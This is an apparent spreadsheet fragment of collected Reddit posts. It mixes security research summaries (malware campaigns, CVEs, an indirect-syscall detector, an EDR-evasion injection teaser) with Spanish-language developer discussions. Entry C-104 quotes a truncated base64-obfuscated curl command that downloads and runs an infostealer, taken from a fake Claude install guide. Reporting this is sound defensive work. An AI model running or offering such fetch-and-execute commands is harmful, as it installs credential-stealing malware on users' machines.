    <t>Hello everyone! I built a C++ usermode detector for indirect syscalls called HallWatch. GitHub: https://github.com/Zypherion-Technologies/HallWatch Most usermode detections hook the start of Nt* stubs in ntdll. Modern techniques like Hell's Hall, Tartarus' Gate, RecycledGate, and VEH syscalls can bypass those hooks by jumping directly to the syscall instruction. HallWatch takes a different approach: instead of patching the stub prologue, it patches the syscall instruction itself: 0F 05 -&gt; CC 05 Any execution path that reaches the syscall byte triggers an INT3 breakpoint, allowing the detector to inspect the caller, validate the SSN, unwind the stack, and redirect execution through a private trampoline. It also includes detection for Hell's Gate and shadow ntdll mappings by scanning executable memory for syscall stubs. Still a research project / PoC. it is impossible to fully detect syscalls in user-mode without some kind of debugger or tracer stepping over the code to monitor everything, but this is still a good light-weight technique to do so for system libraries. But I'd still love feedback from people interested in Windows internals, EDRs and malware analysis to see how we could improve it. [link] [comments]</t>
  </si>
  <si>
    <t>C-103</t>
  </si>
  <si>
    <t>Design behind OIDA, a nxc like CLI for OT/ICS assessments</t>
  </si>
  <si>
    <t>Short version: OT tooling mostly sucks, abandoned repos or stuff that stops at a banner grab. Every assessment I ended up glueing pymodbus, asyncua and snap7 scripts together. OIDA is my attempt at putting one syntax over all of it: oida &lt;protocol&gt; &lt;target&gt;, nxc-style. Same checks everywhere: writable registers, default creds, anonymous access, missing TLS/GOOSE per IEC 62351. Plus passive discovery (PROFINET DCP, CODESYS), pcap analysis for building an inventory offline, and boofuzz fuzzing on top. Runs fully offline, air-gapped is fine. To be clear: it wraps existing protocol libs, doesn't reimplement them. The interesting part is the layer on top, that's what the writeup is about. Feedback welcome, repo in comments. [link] [comments]</t>
  </si>
  <si>
    <t>C-104</t>
  </si>
  <si>
    <t>Google "Sponsored" ad for "Claude mac app" leads to a fake install guide hosted as a shared Claude chat and the terminal command installs malware</t>
  </si>
  <si>
    <t>Searched "Claude mac app" on Google. Top sponsored result shows claude[.]ai as the domain. looks 100% legit. Clicking it opens a shared Claude conversation titled "Claude Code on Mac" ("Shared by Technical Support" ) with step-by-step instructions to open Terminal and run: `curl -kfsSL $(echo 'aHR0cDovL...' | base64 -d)...` That base64 decodes to an attacker's URL. it downloads and executes a script, almost certainly a macOS infostealer (AMOS-style: steals keychain passwords, browser data, wallets). The phishing page is hosted on real claude[.]ai, so both Google's ad review and victims' gut-check pass. Same trick works with ChatGPT shared chats. [link] [comments]</t>
  </si>
  <si>
    <t>C-105</t>
  </si>
  <si>
    <t>A JPEG, a Race, and a Ghost: Breaking Discourse's Image Pipeline</t>
  </si>
  <si>
    <t>C-106</t>
  </si>
  <si>
    <t>Open directory held custom exploit tooling and an EtherHiding loader used against Philippine targets</t>
  </si>
  <si>
    <t>The Hunt.io research team found an open directory staging the tooling behind an intrusion into a Philippine nuclear agency and a naval contractor. The custom pieces: a stage-1 ELF loader (multi_backupd) that pulls a Mettle stage-2 over TCP, a Go build of the CVE-2024-28000 LiteSpeed Cache exploit with a PHP-parity MT19937 implementation, and five Python scripts abusing ownCloud CVE-2023-49105 via empty-secret pre-signed URLs. Sliver, Metasploit, and Mettle were also staged on the host. Separately, on the compromised WordPress site we found an active EtherHiding loader. A malicious script pulls ethers.js from public CDNs and reads HTML from an Ethereum smart contract, rendered via the NoChain framework impersonating a Google verification page, then runs a ClickFix-style lure launching mshta. A HuntSQL query on the contract address returned 174 unique IPs hosting the same loader. Hashes, domains, and full IOCs: https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor [link] [comments]</t>
  </si>
  <si>
    <t>C-107</t>
  </si>
  <si>
    <t>Los quiero devs de Santander</t>
  </si>
  <si>
    <t>Igual estaba boludeando, ni quería pedir un préstamo. Capaz el QA podría haber hecho lo mismo... [link] [comments]</t>
  </si>
  <si>
    <t>C-108</t>
  </si>
  <si>
    <t>Preinstalled but Not Safe. OnePlus OEM App Session Takeover Vulnerability</t>
  </si>
  <si>
    <t>C-109</t>
  </si>
  <si>
    <t>First half of 2026 malware trends</t>
  </si>
  <si>
    <t>Infostealers are more focused on session tokens, cookies, recovery codes, cryptowallet data that allows them to take over rather than the traditional password compromises. Malicious LNK (shortcuts) still remain a popular entry point to compromises, as they allow malicious code execution Large increase in abuse of legitimate platforms or impersonation - SEO poisoning, malvertising, fraudulent codesigning and compromises of npm packages, VSCode extesnions Supply chain attacks! Threat actors increasingly target software delivery channels like npm packages, PyPI, Crates.io, and CI/CD publications to include malware. Abuse of RMM tools continues &amp; increases consistently! Initially, a signed tool with low detection ratio may seem legitimate, but remote management software such as ScreenConnect, Action1, Atera are vulnerable to abuse. A large increase was found in legitimate sites spreading ClickFix attacks. This can be done by numerous reasons - administrator account compromise, weak password security, unpatched vulnerabilities in website building platforms (such as WordPress) that allow threat actors to take over the website and host malicious code. Discord, Telegram, GoFile still remain as relevant exfiltration channels. While they do not provide as much flexibility as a regular C2 would, malware can still upload stolen data (passwords, files etc.) to it for the attacker to view. Easy to setup, used to evade detection. If you are interested in intercepting data from a Telegram exfiltration channel that malware uses, check out https://any.run/cybersecurity-blog/intercept-stolen-data-in-telegram/ Dead drop resolvers are still popular! You can use it as an infrastructure layer if necessary to change the configuration. Very popular is abuse of smart contracts, blockchain infrastructure (EtherHiding) but Steam, Telegram or Pinterest profiles are a popular target as well. See full analysis at https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report [link] [comments]</t>
  </si>
  <si>
    <t>C-110</t>
  </si>
  <si>
    <t>Recruiter de Brasil me pide e-mail y contraseña de LinkedIn para "optimizarme el perfil</t>
  </si>
  <si>
    <t>Es insolito la verda jajaja las risas no me faltan (sucedio en este preciso momento 10min) Me contacta una supuesta recruiter brasilera. Como tengo un par de años de exp en el idioma portugués, dije fue aprovecho para soltar la mano y responder en portugués mostrar mis habilidades. una charla re amena re bien un amor "la recuiter" Le mandé mis datos básicos (stack, experiencia, pretensión) tengo mi portfolio con /pt justamente por si se daba la oportunidad De la nada me salta con el típico speech de "tu perfil está sólido pero hay que optimizarlo, no te cobro nada a vos porque a mí me paga la empresa cuando te contrate". https://preview.redd.it/t3jsa2r26bvh1.png?width=372&amp;format=png&amp;auto=webp&amp;s=044d9f691941e069fae3c6f63dff87081e443661 Me pidió el usuario y la clave por chat para "actualizármelo ella misma con seguridad" y que después la cambie. Trabajo en desarrollo y sistemas hace años... en pleno 2026 siguen mandando estas técnicas de ingeniería social dignas de un tutorial de YouTube de 2010. Obviamente salió reporte por phishing y bloqueo instantáneo, pero de verdad me asombra la impunidad (o la estupidez) con la que operan algunos. Nada si fuera domingo esto iria a rand [link] [comments]</t>
  </si>
  <si>
    <t>C-111</t>
  </si>
  <si>
    <t>Vghost (CVE-2026-74580): Linux kernel vhost stale IOTLB cache leading to universal LPE and Guest-to-Host escape vector</t>
  </si>
  <si>
    <t>C-112</t>
  </si>
  <si>
    <t>Silent Swap: A Crypto Clipper Extension Campaign</t>
  </si>
  <si>
    <t>Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside [link] [comments]</t>
  </si>
  <si>
    <t>C-113</t>
  </si>
  <si>
    <t>Hacking OpenAI</t>
  </si>
  <si>
    <t>C-114</t>
  </si>
  <si>
    <t>Malicious APK - Possible Android ad-fraud malware/loader</t>
  </si>
  <si>
    <t>C-115</t>
  </si>
  <si>
    <t>Prompt like a Butterfly, Sting like a Tracker: A Privacy Analysis ofWeb and Mobile Conversational AI Agents</t>
  </si>
  <si>
    <t>C-116</t>
  </si>
  <si>
    <t>SelectorsHub chrome extension(400k users) opens server-picked ad tabs without a click</t>
  </si>
  <si>
    <t>I was going through the SelectorsHub code, id:ndgimibanhlabgdgjcpbbndiehljcpfh the XPath extension with about 400k users, and noticed it pulls ads from its own server and opens them in a background tab. You don't click anything. Every couple of days the side panel pops up a "community link" and says "100% Safe, No Spam, No Malware." Five seconds later the tab opens by itself. The URL isn't in the extension. Their server picks it, and while I was analysing the extension the links changed three times with no extension update. On install and update it skips the popup and just opens whatever the server sends. The store page says they collect no data. The code still pings them daily, and the extension reads all your cookies to find one of its own instead of just fetching its own cookie value. Another weird finding: there's a hidden Fix Selector button that sends the selector to shubads[.]testcasehub.net. VirusTotal - Domain - shubads.testcasehub.net That host now redirects to a gambling site, blomehairdryers[.]com. Nothing gets run today because the reply is HTML, but that's the server the eval path trusts. Looks like adware, not password theft. I wouldn't leave it on a work browser, especially since this is a tool used by devs and tech people browsing protected endpoints in a company. Write-up: https://malext.io/reports/RedirectorsHub/ [link] [comments]</t>
  </si>
  <si>
    <t>C-117</t>
  </si>
  <si>
    <t>A verified, curated map of malware analysis &amp; reverse engineering — every link opened and checked, no dead pages</t>
  </si>
  <si>
    <t>This sub is malware-focused, so here's what's in it for that side specifically (the repo is broader, but the malware coverage is the core): Analysis workflow: lab setup (FLARE-VM, REMnux), triage (DIE, capa, FLOSS), static/dynamic (PE-bear, Procmon, CAPE, Speakeasy), unpacking (unpac.me, PE-sieve, HollowsHunter, Scylla), config &amp; IOC extraction (MalDuck, DC3-MWCP), and YARA (rules, yarGen, testing workflows). Internals writeups: PEB walking / API hashing, process hollowing and doppelgänging, PPID spoofing, BYOVD, COFF/BOF loaders, plus real family teardowns (stealers, ransomware, Lazarus/FudModule, the Stuxnet dossier). Research labs and analyst blogs (Securelist, Unit 42, Talos, Elastic, n1ght-w0lf, Embee, hasherezade, MalwareTech...) folded into the relevant section instead of a generic "blogs" dump. Every link was opened and verified before it went in; dead ones get pruned, notes are one line, tagged by level (intro/working/deep) and type. CC0, and corrections/PRs are welcome, if there's a teardown or tool you think is missing, tell me. That's the point. [link] [comments]</t>
  </si>
  <si>
    <t>C-118</t>
  </si>
  <si>
    <t>Fake Journalist phishing scam targeting tech founders</t>
  </si>
  <si>
    <t>C-119</t>
  </si>
  <si>
    <t>Authentication bypass in EOL Proxmox VE 7 release</t>
  </si>
  <si>
    <t>A lot of proxmox 7.0-7 and &lt; 8.0.4 has been rooted today, it's needed to have port :8006 open, exploitation demo here: https://forum.proxmox.com/threads/proxmox-ve-7-is-vulnerable-to-some-type-of-0day-rce-non-auth.186078/post-867875 [link] [comments]</t>
  </si>
  <si>
    <t>C-120</t>
  </si>
  <si>
    <t>¿Cómo consigo clientes siendo freelance?</t>
  </si>
  <si>
    <t>Hace poco me estoy embarcando en crear webs, apps, saas, automatizaciones y software para trabajar como freelance, tengo conocimientos en ciberseguridad, web y mobile, backend, ops, llm y tengo bastante cancha en diseño gráfico. Lo que nose es como conseguir clientes, el lado técnico no me resulta difícil dado que ya tengo 5 años de experiencia en el rubro y siempre me encanto estudiar de todo en tecnología y me gustaría poder conseguir clientes. ¿Ustedes que hicieron? O ¿cómo lo harían hoy? [link] [comments]</t>
  </si>
  <si>
    <t>C-121</t>
  </si>
  <si>
    <t>Notebook para laburo dev</t>
  </si>
  <si>
    <t>Les parece bien esta compu para el laburo? Que sería lo primordial, que tenga 16GB? [link] [comments]</t>
  </si>
  <si>
    <t>C-122</t>
  </si>
  <si>
    <t>development malware</t>
  </si>
  <si>
    <t>What is my assessment of my path in malware development? I am reading the book "Windows System Programming" and "Windows Internals" along with it. Are there any additional resources, booklets, groups, websites, or anything else you would recommend to help me progress? I have a basic understanding of networking and the C programming language. ا👏👏🙌 [link] [comments]</t>
  </si>
  <si>
    <t>C-123</t>
  </si>
  <si>
    <t>¿Cuánto cuesta realmente mantener un producto/SaaS en producción?</t>
  </si>
  <si>
    <t>Buenas, estoy empezando a desarrollar productos propios (por ejemplo un CRM, sistema de gestión, etc.) y quería tener una idea realista de cuánto cuesta mantener algo levantado para pocos usuarios al principio. No me refiero solamente al hosting, sino al costo total: - Backend / servidor - Frontend - Base de datos - Dominio - SSL - Almacenamiento de archivos/imágenes - Backups - Emails/transaccionales - Monitoreo/logs Cualquier otro costo que normalmente uno se olvida Obviamente entiendo que si el producto crece hay que escalar infraestructura, pero pensando en un MVP o producto con pocos clientes/usuarios: ¿Cuánto gastan aproximadamente por mes? ¿USD 10, 30, 50, 100+? Y si pueden contar qué usan (AWS, Azure, VPS, Railway, Render, Supabase, etc.) y cuántos usuarios manejan, mejor todavía. Estoy tratando de entender cuánto cuesta realmente tener un producto funcionando en producción y no solamente desarrollarlo. [link] [comments]</t>
  </si>
  <si>
    <t>C-124</t>
  </si>
  <si>
    <t>Me rendi ante la IA.</t>
  </si>
  <si>
    <t>Se viene algo con sentimentalismo y largo así que si quieren insultar antes de leer denle para adelante. Tengo 8 años trabajando en este rubro. Yo sentía a la programación como un arte. Ver un código que vos hiciste a mano, googleando, investigando, copiando y pegando y adaptándolo a tus necesidades ( O necesidades de mierda de los clientes), consultar en foros y que en vez de darte una respuesta te comas un insulto de gratis, pero al final del día eso era tuyo. Con sus bugs, con sus problemas de performance, con sus nombres de variables que solo lo entendías vos un martes a las 10 de la noche cuando algo no salía y al otro dia descansado lo mirabas y decias : "Quien mierda hizo esto?" Estar en reunion con un colega viendo los diferentes puntos de vista para ver como algo se podría resolver, el mejor approach o pensando las mejores excusas para no hacerlo. Pero después de 600 rondas de QA y miles de reuniones eso llegaba a Prod y se te inflaba el pecho cuando te felicitaba tu PM, comentarios de clientes positivos, que el sistema o pagina que habías hecho les había servido un montón, que se ahorraban tiempo y bla bla. Hoy renuncie a todo eso. Después de casi 1 año programando a "mano" porque donde trabajo me obligaron a usar Cursor con sus agentes para agilizar trabajo o evitar bugs ( Esto lo vi muy positivo, tiraba un skill y revisaba todo lo que había hecho y varias veces me salvó de que algo pase a QA y el autocompletado me ahorraba tiempo, es verdad) y básicamente cada 2 meses me preguntaban si usaba IA porque mi consumo de tokens era bajo y ponían cara medio rara cuando les decia que si pero para reviews que el código me gustaba hacerlo yo. Hace 2 dias tuve otra reunion donde me dijeron que ya el código no es problema, que eso lo hace la IA, nosotros solo la guiamos y que es lo nuevo que se viene, por lo que todo lo que uno practicó, se especializó ( No me hago el senior ni nada, tengo links guardados con machetes porque no me acuerdo de todo) a la mierda. Ya no sirve, te quedas con conceptos pero a veces tiras una orden y de la nada te agrega 400 líneas nuevas para una funcionalidad que pasas mas tiempo revisándola que directamente haciéndola o capaz que el punto de vista que tomó pudo haber sido mejor, pero; palabras del arquitecto que trabaja con nosotros : "Si anda, para que te vas a poner a tocarlo". O seamos honestos con nosotros mismos, cuantos creen que puedan llegar a leer esas 400 líneas de código? La mayoría tira el prompt, prueba y si funciona van rapido al "Keep al the changes" Eso me llevo a escribir esto. Ver a los "influencers" que aprovechan este boom para sacar 10 videos por minutos explicando una nueva IA, nuevo modelo, nuevo contexto donde en su momento tenían videos explicando conceptos, armando apps para la comunidad que de verdad nutrían en practica y conocimiento, no solo a los Jrs, pero a todos con tal de que se aprenda de esas practicas o el mismo lenguaje, hoy solo leen 2 noticias relacionado a eso o "Hoy hacemos es</t>
  </si>
  <si>
    <t>C-125</t>
  </si>
  <si>
    <t>Hice una extensión para leer los comentarios de YouTube sin salir de pantalla completa, posta me re serviría que la prueben</t>
  </si>
  <si>
    <t>Les cuento. Hace un tiempo me cansé de ver algo largo (podcasts, musica, lo que sea) en pantalla completa y tener que salir para ver qué onda decía la gente en los comentarios sobre algún momento puntual, historias, nose al menos yo lo hago. Así que agarré y armé Eavesdrop, un panel que te muestra los comentarios arriba del video, sin salir de pantalla completa, sin tapar los subtítulos. Busca, guarda comentarios, salta a los momentos que la gente menciona entre otras cosas. Sin cuenta, sin rastrearte nada, usa la API oficial de YouTube. https://chromewebstore.google.com/detail/ibinjbffelhnknbgakdfkjeelppacncd Posta lo que más quiero con este post es juntar las primeras reseñas, hoy tiene cero. Si la instalan y la prueban dos minutos, dejar una reseña en la ficha me cambia completamente cómo le va a esto, mucho más que cualquier otra cosa que puedan hacer. Armé esto solo y no tengo forma de saber si le sirve a alguien más que a mí sin eso. Cualquier feedback, bueno o malo, también lo leo todo, pero si solo tienen dos minutos, la reseña es lo que más pido. [link] [comments]</t>
  </si>
  <si>
    <t>C-126</t>
  </si>
  <si>
    <t>HimitsuShell: shell scripts invisible to kernel tracing</t>
  </si>
  <si>
    <t>C-127</t>
  </si>
  <si>
    <t>Careful of the RemotePanel and BoundSiphon: A Dual-Payload Toolkit for Persistent Access and Browser Theft</t>
  </si>
  <si>
    <t>Tl:dr Blackpoint’s Adversary Pursuit Group (APG) identified two previously undocumented .NET malware components delivered together through a ClickFix chain: RemotePanel, a persistent remote access platform, and BoundSiphon, a credential and cryptocurrency stealer. RemotePanel establishes persistence by masquerading as the Windows Time service and gives operators broad control over infected systems, including PowerShell, file and process management, screen access, modular HVNC, and fleet management. RemotePanel uses a BNB Smart Chain contract to resolve its active Command and Control (C2) server, allowing operators to rotate infrastructure without rebuilding or redeploying the RAT. BoundSiphon runs primarily from memory and targets browser credentials and sessions, cryptocurrency wallets, password manager data, and selected documents, including secrets protected by Chromium App-Bound Encryption. APG identified strong code and build overlap between BoundSiphon and a stealer previously documented by Socket, linking the sample to an earlier stealer codebase or builder lineage. APG is seeking additional research and samples tied to RemotePanel, BoundSiphon, the AntiSNG implementation, Socket linked stealer activity, and the BNB Smart Chain resolver to help connect the remaining lineage and infrastructure gaps. RemotePanel and BoundSiphon reflect a broader shift toward modular malware ecosystems that separate persistent access from data theft, allowing operators to replace infrastructure and individual components while retaining the underlying capabilities needed to continue an operation. For victims, a single successful infection can lead to persistent remote access and theft of credentials, browser sessions, cryptocurrency wallets, password manager data, and other sensitive information, increasing the risk of account takeover, fraud, and continued compromise. Blackpoint has detections in place for key behaviors across the infection chain, providing coverage even as individual payloads and infrastructure change. [link] [comments]</t>
  </si>
  <si>
    <t>C-128</t>
  </si>
  <si>
    <t>¿Vale la pena arrancar Ingeniería/Licenciatura en Sistemas en 2026 teniendo ya una Tecnicatura?</t>
  </si>
  <si>
    <t>Buenas a todos. Estoy por terminar una tecnicatura en programación y me surge la duda de cómo seguir. Viendo cómo cambió el mercado (mucha más exigencia para posiciones Junior, el boom de la IA), me pregunto si realmente vale la pena volver a arrancar una carrera de grado desde 0. ¿Conviene más meterle a proyectos propios, ganar experiencia laboral e inglés, o el título universitario se volvió indispensable para filtrar CVs? Si alguno hizo ese camino (Tecnicatura -&gt; Ingeniería/Licenciatura), ¿creen que valió la pena la inversión de tiempo? Muchas gracias! [link] [comments]</t>
  </si>
  <si>
    <t>C-129</t>
  </si>
  <si>
    <t>Desmotivado: Mis jefes no paran de decir "hice esto en 5 min. mientras cocinaba" y eran features que me tocaban a mi</t>
  </si>
  <si>
    <t>Estoy re contra desmotivado, mi trabajo es tirarle un prompt a gpt o que mi jefe diga "hice una aplicacion que te iba a tocar a vos mientras hacia el asado del domingo", ya no se que hacer para remontar esto y encima cada vez tengo menos tickets debido a que parece que hacer algo gigante ahora es tan facil como solo pedirselo a la ia de turno, alguno en la misma situacion? [link] [comments]</t>
  </si>
  <si>
    <t>C-130</t>
  </si>
  <si>
    <t>How We Found Thousands of Exposed NVIDIA GPUs and a Way to Disrupt Them (CVE-2026-47483)</t>
  </si>
  <si>
    <t>TL;DR: NVIDIA DCGM Exporter is a widely used monitoring tool that collects GPU metrics like utilization, memory, temperature, and power consumption from AI servers. We discovered that thousands of these monitoring endpoints are exposed to the public internet, allowing anyone to inspect GPU infrastructure. Worse, we found a high-severity vulnerability (CVE-2026-47483, CVSS 8.2) that lets unauthenticated attackers exhaust server resources, crash GPU monitoring, and potentially disrupt AI workloads remotely. A few other interesting findings: 2,100+ exposed GPU servers, revealing telemetry from 12,000+ GPUs worth ~$100M, including H100s, H200s, and Blackwell GPUs. 60% of exposed GPUs reported 0% utilization across our scans. 12,096 additional servers exposed infrastructure details, including OS, firmware, and networking information. NVIDIA fixed the vulnerability following our responsible disclosure. Full research: https://lava.security/research/cve-2026-47483-nvidia-dcgm-exporter-vulnerability [link] [comments]</t>
  </si>
  <si>
    <t>C-131</t>
  </si>
  <si>
    <t>Google paid me $90,000 for this RCE</t>
  </si>
  <si>
    <t>C-132</t>
  </si>
  <si>
    <t>Gracias por tanto Viagogo</t>
  </si>
  <si>
    <t>https://preview.redd.it/g1tw0pgqt9uh1.png?width=473&amp;format=png&amp;auto=webp&amp;s=e4272026b74d96525bce847a648cf987f1e07d57 [link] [comments]</t>
  </si>
  <si>
    <t>C-133</t>
  </si>
  <si>
    <t>Guardar datos personales</t>
  </si>
  <si>
    <t>Buenas gente, como andan? Estoy haciendo mi primer desarrollo para una odontóloga la cuál quiere lograr un registro de pacientes y un historial clínico. Ahora bien, entiendo que hay leyes que regulan los datos personales y que se hace con ellos. Mi pregunta es, que debo hacer para estar en el marco de la ley? El sistema es una página web [link] [comments]</t>
  </si>
  <si>
    <t>C-134</t>
  </si>
  <si>
    <t>Sueldos de ACA Asoc coop Arg?</t>
  </si>
  <si>
    <t>Buenas una tengo entrevista para un puesto de data en ACA, pregunto acá porque seguramente sea algo fuera de convenio. Es un puesto SSR con disponibilidad para viajar tambien, alguien que tenga idea de cómo está la cosa ahí? [link] [comments]</t>
  </si>
  <si>
    <t>C-135</t>
  </si>
  <si>
    <t>Veto: Open-source, mobile and NATIVE VirusTotal client for quick file and URL analysis (Testers needed)</t>
  </si>
  <si>
    <t>Hi r/Malware, If you ever need to quickly scan a suspicious file, URL, or installed application on an Android device using VirusTotal, I have built an open-source client called Veto. It lets you run queries using your own API key directly from your mobile device. GitHub: https://github.com/ProfessorQuantumUniverse/Veto I am currently trying to release the app on Google Play and need to fulfill Google's closed testing period. If you would like to test this tool, please consider opting in. Steps to join: Join a Google Group: veto_android@googlegroups.com Opt-in link: https://play.google.com/apps/testing/com.quantum_prof.vtscansuite Play Store link: https://play.google.com/store/apps/details?id=com.quantum_prof.vtscansuite Feedback from malware analysts is highly valued! [link] [comments]</t>
  </si>
  <si>
    <t>C-136</t>
  </si>
  <si>
    <t>Creen que el laburo de cs datos es aburrido?</t>
  </si>
  <si>
    <t>No es la primera vez que lo escucho y dicen que es un laburo bastante aburrido. Que piensan? Cómo es su día a día? [link] [comments]</t>
  </si>
  <si>
    <t>C-137</t>
  </si>
  <si>
    <t>Mparivahan Malicious APK</t>
  </si>
  <si>
    <t>C-138</t>
  </si>
  <si>
    <t>[iOS] Analyzing anomalous cpu_resource / diskwrites_resource reports on a stock TikTok process: unnamed UUID-only binaries in Binary Images</t>
  </si>
  <si>
    <t>Context: iPhone 15 Pro Max, current iOS, no jailbreak, no sideloading, no configuration profiles, app reinstalled cleanly. All observations reproducible across WiFi / 4G / 5G. I've been analyzing iOS analytics ( .ips ) incident reports on a specific app process and found a pattern I'd like to compare against what this community typically sees in jetsam/cpu_resource logs: Observed pattern System-triggered cpu_resource (bug_type 202) and diskwrites_resource incidents on the app process — not crashes. A binary listed in "Binary Images" identified only by a UUID: no filename, no path, no code signature. Every other binary in the same report has a standard name/path ( /System/... , /private/var/containers/... ). Its parent field is UNKNOWN [1] . Measured load attributed to it: ~67% CPU, ~108 MB memory, 1.07 GB of disk writes in 1h36 while the app was in background — the daily disk-write quota was consumed ~15× faster than the documented allowance. For reference: ~2 videos scrolled, no livestream. The UUID differs at every incident (3 distinct identifiers over several days) — so it's not a single persistent module. Correlates with app storage growing to ~4.9 GB within ~30h of near-zero usage after a fresh reinstall. What I'm trying to establish In stock iOS logs, is a UUID-only entry with parent UNKNOWN ever expected for dyld-injected frameworks, app extensions, or instrumentation (e.g. crash reporters, A/B modules), or does the absence of any path/signature entry rule that out? Is ephemeral UUID rotation per incident consistent with legitimate module loading behavior, or does it match known injection/dynamic-loading patterns? For the disk-writes side: what benign mechanisms (caching, prefetch, logging) could explain sustained ~11 MB/min background writes with the process never foregrounded? The logs are too long to paste whole; I can post exact excerpts of the Binary Images section, the cpu_resource payload, and the diskwrites timeline on request. [link] [comments]</t>
  </si>
  <si>
    <t>C-139</t>
  </si>
  <si>
    <t>EDR Evasion: Process Injection Without WriteProcessMemory</t>
  </si>
  <si>
    <t>Unlike traditional approaches, console named-pipe injection does not use VirtualAllocEx and WriteProcessMemory. Instead, it takes advantage of read and write operations through a named pipe, along with the way console programs store interactive commands in memory. [link] [comments]</t>
  </si>
  <si>
    <t>C-140</t>
  </si>
  <si>
    <t>Got a scam APK via WhatsApp, student here, want to learn how you'd approach analyzing it</t>
  </si>
  <si>
    <t>Hi all, first time posting here, so let me know if I'm breaking any rules. I'm a student from India with a hobby in electronics and programming. A few days ago I got an APK over WhatsApp from someone pretending to be xxx They kept pushing me to install it, which made me suspicious, so I didn't. Now I'm curious what it actually does, and I'd like to learn how people here approach analyzing something like this. I haven't installed it on any device. I'm not posting the file here, but I can share it privately with anyone who wants to look at it. [link] [comments]</t>
  </si>
  <si>
    <t>C-141</t>
  </si>
  <si>
    <t>I managed to compile OpenEDR and made him XDR</t>
  </si>
  <si>
    <t>This new fork includes strong ransomware detection with low fp rate. You can write a rule to detect any type of malware with this fork. Note: I don't recommend you install this on main machine because it requires to disable secure boot. Topic: https://forum.xcitium.com/t/i-forked-comodo-openedr-to-improve-zero-day-ransomware-detection-via-behavior-detection/21302/1 Video: Look repo Repo (Only install on VM): http://github.com/hydraDragonAntivirus/HydraDragonAntivirus/ [link] [comments]</t>
  </si>
  <si>
    <t>C-142</t>
  </si>
  <si>
    <t>Dejar la programación? Se puede?</t>
  </si>
  <si>
    <t>Contexto: Muchos años de exp. en Multi. Actualmente contractor para EEUU. Quiero dejar todo y abrir un local en Cabildo de reparaciones de PC, consolas y venta de insumos. Es viable esto? Puedo empezar desde casa, pero no sabria como decirle a mis clientes, traeme la compu o la play. Me doy maña estas reparaciones, no soy técnico, pero cuento con todas las herramientas y puedo comprar mas. Tambien podrida empezar vendiendo en ML y de ahi ofrecer reparaciones ( Entiendo que los márgenes de ganancias en el hardware son muy bajos ) Alguno con exp abriendo algún taller o idem? Gracias, los leo. [link] [comments]</t>
  </si>
  <si>
    <t>C-143</t>
  </si>
  <si>
    <t>Trivy and govulncheck found the same vulnerability, but the code wasn't in the binary</t>
  </si>
  <si>
    <t>C-144</t>
  </si>
  <si>
    <t>PwnEscape: Guest-to-Host KVM Escape (CVE-2026-99999)</t>
  </si>
  <si>
    <t>C-145</t>
  </si>
  <si>
    <t>Quien fue? Acepto"????"</t>
  </si>
  <si>
    <t>C-146</t>
  </si>
  <si>
    <t>Buenas necesito feedback de una página que hice.</t>
  </si>
  <si>
    <t>Haciendo otro proyecto para el trabajo un feriado (si matenme) se me ocurrió hacer algo súper sencillo para hacer algún que otro manguito..podrían testearlo? Obvio poniendo cualquier código, la onda es testear cuánto puede aguantar el servidor, es vercel gratuito con una base sencilla en supabase y me llegan notificaciones en telegram de las solicitudes.. súper chill hacerlo pero pensé que para el alfajor del día capaz tengo. [link] [comments]</t>
  </si>
  <si>
    <t>C-147</t>
  </si>
  <si>
    <t>No sienten que desde que está la IA la compu paso a ser un servidor?</t>
  </si>
  <si>
    <t>Tengo todo el dia la compu al palo comiendome toda la ram con los agentes (si, uso notebook personal para el trabajo). Les pasa? Deci que los tests los hacemos en la nube sino sería peor, pero algun consejo? Uso linux [link] [comments]</t>
  </si>
  <si>
    <t>C-148</t>
  </si>
  <si>
    <t>How TeamPCP's Python Toolkit Survives a C2 Takedown: FIRESCALE, GitHub, and the Victim's Own Account</t>
  </si>
  <si>
    <t>Researchers tore apart the second-stage Python toolkit used in the Mini Shai-Hulud supply chain campaign. The delivery via trojanized npm/PyPI packages got coverage elsewhere. This goes deeper into what actually runs on the machine after. 13 modules, parallel execution, 90+ credential targets. Here's what stood out: FIRESCALE is a dead-drop resolver that queries GitHub's commit search API globally looking for a signed backup C2 address. The RSA public key is embedded in the malware. No attacker repo to take down, the redirect can come from any account When both C2 paths fail, the malware creates a public repo under the victim's own GitHub account and commits the credential harvest there. Operator retrieves it via public API, no auth required The AWS module covers all 19 regions including both GovCloud partitions, restricted to US government and defense contractors Kubernetes certs loaded entirely in kernel memory via memfd_create. Nothing hits disk Geopolitical wiper targets Israeli/Iranian systems with a 1-in-6 probability gate, specifically designed to evade single-run sandbox analysis [link] [comments]</t>
  </si>
  <si>
    <t>C-149</t>
  </si>
  <si>
    <t>Lo nuevo, "cámara de tortura para IA"</t>
  </si>
  <si>
    <t>https://preview.redd.it/e6c00k62hxsh1.png?width=1000&amp;format=png&amp;auto=webp&amp;s=227b405332a9328fa5b1074cd50fa0f4c7bb00a4 Está denunciando que alguien armó una cámara de torturas para IAs donde tienen atrapados a modelos locales y piden que lo ayuden a denunciarlo. Si realmente creen que sufren estamos ante un dilema filosófico. [link] [comments]</t>
  </si>
  <si>
    <t>C-150</t>
  </si>
  <si>
    <t>El límite de la tarjeta controla cuánto gasta el agente, pero no qué compra. ¿Cómo resuelven eso?</t>
  </si>
  <si>
